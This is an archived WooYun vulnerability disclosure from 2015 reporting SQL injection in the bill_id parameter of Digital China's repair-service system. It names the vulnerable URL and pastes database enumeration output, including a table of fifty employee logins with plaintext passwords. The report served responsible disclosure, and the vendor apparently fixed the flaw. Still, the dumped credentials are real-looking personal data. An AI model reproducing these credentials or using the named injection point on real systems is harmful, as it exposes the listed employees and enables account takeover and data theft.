乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-10: 细节已通知厂商并且等待厂商处理中 2015-09-10: 厂商已经确认,细节仅向厂商公开 2015-09-11: 厂商已经修复漏洞并主动公开,细节向公众公开
rt
神州数码维修服务管理系统 如下链接存在sql注入,其中,bill_id参数有问题
http://servexpress.digitalchina.com/sms/DELL/wurnew/snap_sdar.asp?bill_id=D506184191
发现11个库
以U_DELL库为例,发现千万规模的表
back-end DBMS: OracleDatabase: U_DELL+-----------------------+---------+| Table | Entries |+-----------------------+---------+| OPT_LIST | 22807944 || SER_RC_END | 9989419 || EDI_DETAIL | 5221963 || EDI_INVENTORY_TEMP_3S | 2814074 || REQ_LIST | 1770091 || SER_BACK_CLASS | 1703605 || REQ_INF | 1614940 || BILL_INDEX | 1606424 || T142_20_C | 1592256 || SER_INDEX | 1513885 || BILL_LIST_BAK | 1459097 || SER_INF_BAK | 1404593 || PART_LIST_BAK | 1293696 || RMA_PICK_UP_BAK | 1138502 |
以ERS库为例,发现百万规模的表
Database: ERS+---------------------+---------+| Table | Entries |+---------------------+---------+| LOGIN_LIST | 4141728 || CUST | 2718576 || PERSON_INF | 2392669 || CCS_DELL_RESULT | 1154633 || MAIL | 1056855 || CCS_CASE | 854095 || ORGNIZATION_PROFILE | 316973 || CCS_AD_BILL | 260222 || CCS_AD_OPT_LOG | 116561 || DAY_LIST | 10000 |
泄露的账户信息,包括:用户名、密码等,密码竟然是明文存储,我也是醉了
Database: ERSTable: DIC_USERS[50 entries]+---------+-------------+--------------+-----+-------------+----------------------+| USER_ID | LOGIN_ID | PASSWORD | M1 | M2 | LAST_UPDATE_PWD_DATE |+---------+-------------+--------------+-----+-------------+----------------------+| 10140 | dc-fucx1 | zzzzzz1 | nec | dc-fucx1 | 2015-04-01 15:56:26 || 10141 | xa-songzy | song123 | nec | xa-songzy | 2009-10-09 09:38:18 || 10142 | bj-zhaoyan | 885669 | nec | bj-zhaoyan | 2001-01-01 00:00:00 || 10144 | dc-lyq | 1qa23z | nec | dc-lyq | 2012-03-12 11:48:43 || 10145 | sh-kl | 64661559kl | nec | sh-kl | 2011-09-07 18:27:12 || 10146 | bj2-yzy | yzy | nec | bj2-yzy | 2001-01-01 00:00:00 || 10147 | wh-lvyp | lyp811214 | nec | wh-lvyp | 2008-12-15 10:10:58 || 10148 | sy-huanghai | huanghai | nec | sy-huanghai | 2001-01-01 00:00:00 || 10149 | bj-libr | libr | nec | bj-libr | 2001-01-01 00:00:00 || 10150 | bj-liujd | 12345 | nec | bj-liujd | 2001-01-01 00:00:00 || 10151 | xa-liwq | 123456l | nec | xa-liwq | 2015-04-01 14:24:12 || 10152 | dc-syl | enter | nec | dc-syl | 2001-01-01 00:00:00 || 10153 | bj-lj | lijiae1 | nec | bj-lj | 2009-10-09 10:58:50 || 10154 | bj-fuqh | fuqh | nec | bj-fuqh | 2001-01-01 00:00:00 || 10155 | dc-zb | zhaobin7879 | nec | dc-zb | 2014-06-16 17:59:19 || 10156 | nj-zt | nj | nec | nj-zt | 2001-01-01 00:00:00 || 10157 | bj-fanyj | blfiqpgf | nec | bj-fanyj | 2001-01-01 00:00:00 || 10158 | bj-jl | akuma820809 | nec | bj-jl | 2001-01-01 00:00:00 || 10159 | bj2-jl | akuma820809 | nec | bj2-jl | 2001-01-01 00:00:00 || 10160 | bj2-mn | maning122802 | nec | bj2-mn | 2013-02-21 14:29:31 || 10161 | bj2-fyj | 198000 | nec | bj2-fyj | 2001-01-01 00:00:00 || 10162 | bj-xzm | xzm | nec | bj-xzm | 2001-01-01 00:00:00 || 10163 | sh-zxl | zxl321 | nec | sh-zxl | 2015-04-03 14:39:05 || 10164 | bj-zhy | zhy123 | nec | bj-zhy | 2013-07-08 09:16:43 || 10165 | dc-cc | dccc800 | nec | dc-cc | 2015-06-26 09:25:13 || 10166 | bj-lbw | 5211314 | nec | bj-lbw | 2001-01-01 00:00:00 || 10167 | sh-lx | anad0728 | nec | sh-lx | 2015-05-08 18:08:50 || 10168 | dc-sqj | 13301353150 | nec | dc-sqj | 2001-01-01 00:00:00 || 10170 | dc-wwj | 0606wwj | nec | dc-wwj | 2011-09-14 09:42:55 || 10171 | dc-wg | newpass123x | nec | dc-wg | 2013-09-23 15:13:00 || 10173 | bj-hxq | hxq000 | nec | bj-hxq | 2015-01-23 09:20:29 || 10175 | sh-zsy | tos901 | nec | sh-zsy | 2014-05-13 16:15:57 || 10176 | wh-lly | asd321 | nec | wh-lly | 2014-03-28 12:35:06 || 10177 | sz-tzy | NONE | nec | sz-tzy | 2001-01-01 00:00:00 || 10178 | bj-ty | ty19710401 | nec | bj-ty | 2008-12-31 15:16:16 || 10179 | bj-ln | 1234 | nec | bj-ln | 2001-01-01 00:00:00 || 10180 | bj-mn | 19810802 | nec | bj-mn | 2001-01-01 00:00:00 || 10181 | bj-wl | 741852pp | nec | bj-wl | 2013-07-04 18:44:50 || 10182 | bj-jxl | ooo | nec | bj-jxl | 2001-01-01 00:00:00 || 10183 | dc-nw | 781029 | nec | dc-nw | 2001-01-01 00:00:00 || 10184 | jn-zl | 123asd | nec | jn-zl | 2009-10-16 15:38:12 || 10185 | nj-zxy | zxy | nec | nj-zxy | 2012-07-05 14:19:53 || 10186 | dc-zhuhj | aaa111 | nec | dc-zhuhj | 2014-06-06 11:21:41 || 10187 | dc-niewei | 456 | nec | dc-niewei | 2001-01-01 00:00:00 || 10188 | nec-jzq | nec12345 | nec | nec-jzq | 2009-01-05 13:57:29 || 10189 | 10189 | lizhb2009 | nec | cd-zhouzh | 2010-09-21 18:17:24 || 10190 | nec-zq | nec111 | nec | nec-zq | 2009-03-12 17:55:26 || 10191 | nec-zgyj | 11111 | nec | nec-zgyj | 2001-01-01 00:00:00 || 10192 | nec-hy | 12345678 | nec | nec-hy | 2001-01-01 00:00:00 || 10193 | dc-yangqian | 42yangqian | nec | dc-yangqian | 2014-07-15 11:35:09 |+---------+-------------+--------------+-----+-------------+----------------------+
危害等级:高
漏洞Rank:18
确认时间:2015-09-10 11:05
尽快处理!
2015-09-11:已修复